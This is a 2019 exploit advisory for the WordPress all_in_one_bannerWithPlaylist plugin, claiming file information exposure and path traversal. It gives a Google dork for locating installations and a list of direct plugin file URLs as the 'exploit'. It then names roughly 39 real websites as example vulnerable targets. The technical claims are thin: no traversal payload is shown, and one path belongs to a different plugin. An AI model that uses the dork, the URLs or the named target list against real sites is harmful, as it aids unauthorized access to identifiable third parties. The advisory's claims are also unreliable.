WordPress all_in_one_bannerWithPlaylist Plugins 5.0.3 File Information Exposure

###########################################################################

# Exploit Title : WordPress all_in_one_bannerWithPlaylist Plugins 5.0.3 File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com ~ responsivejqueryslider.com
# Software Download Link : responsivejqueryslider.com/wordpressplugin/playlist_banner.html
# Software Information Link : 
themesinfo.com/wordpress-plugins/wordpress-all_in_one_bannerwithplaylist-plugin-dgut
# Tested On : Windows and Linux
# Category : WebApps
# Affected Versions : 1.0 - 1.2.8 - 1.4.7 - 1.8.1 - 1.8.5 - 
2.0 - 2.1.3 - 2.2.0 - 2.4 - 4.0.25 - 4.5.16 - 4.9.9 - 5.0.3
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/all_in_one_bannerWithPlaylist/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]

###########################################################################

# Impact :
********

* WordPress all_in_one_bannerWithPlaylist 5.0.3 and other versions is prone to an arbitrary file disclosure 

vulnerability because it fails to properly sanitize user-supplied input.

* An attacker can exploit this vulnerability to view local files in the context of the web server process, 

which may aid in launching further attacks. 

* An information exposure is the intentional or unintentional disclosure 

of information to an actor that is not explicitly authorized to have access to that information.

* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* The software uses external input to construct a pathname that is intended to identify a file or 

directory that is located underneath a restricted parent directory, but the software does not 

properly neutralize special elements within the pathname that can cause the pathname 

to resolve to a location that is outside of the restricted directory.

###########################################################################

# Exploit :
***********************

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php?page=all_in_one_bannerWithPlaylist_Manage_Banners

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php?page=all_in_one_bannerWithPlaylist_Playlist

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/banners.php

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/help.php

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Manage_Banners

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Add_New

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Settings

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Playlist

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Help

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/playlist.php

/wp-content/plugins/lbg_zoominoutslider/tpl/preview.html

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/settings_form.php

###########################################################################

# Video Tutorials :
*****************

Step 1: Installation : youtube.com/watch?v=nYp94Ri8CME
Step 2: Manage Images : youtube.com/watch?v=gQezs4xWwSs
Step 3: Manage Text Over Image : youtube.com/watch?v=3wR64OtLx7Q
Step 4: Manage Multiple Banners : youtube.com/watch?v=3EfdmbjTvoY

###########################################################################

# Example Vulnerable Sites :
*************************

[+] lwd.org.kh/lc/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] copas-mpa.fr/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] okrls.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php

[+] eagletonpoll.rutgers.edu/new-wp/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] fcsn.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] i-groupuk.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] princetonmanagement.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] looemarineconservation.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] liftandlube.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] lehmanneng.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] wallaces.ie/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] walkthewalkamerica.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] whoshapesourtimes.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] wemarket-lb.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] fight-club.tv/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] theayurway.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] wellingtonbridge.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] tuacapulco.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] mmojam.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] moebelaktion.ch/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] aquapools.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] huris.nl/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] certifiedtreeservices.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] park-med.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] llcform.us/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] krankas.sk/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] truescapemo.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] thereverendesquire.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] thebarrebelles.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] theaxess.net/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] ltsa.com.br/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] interkomitet.uz/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] avcaix.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] schoenphoto.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] yucatanbeachstand.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] roseumedicalcenter.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] eftportal.com.br/gilberto/homologacao/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] cappello.co.za/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] tarwada.co.ae/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################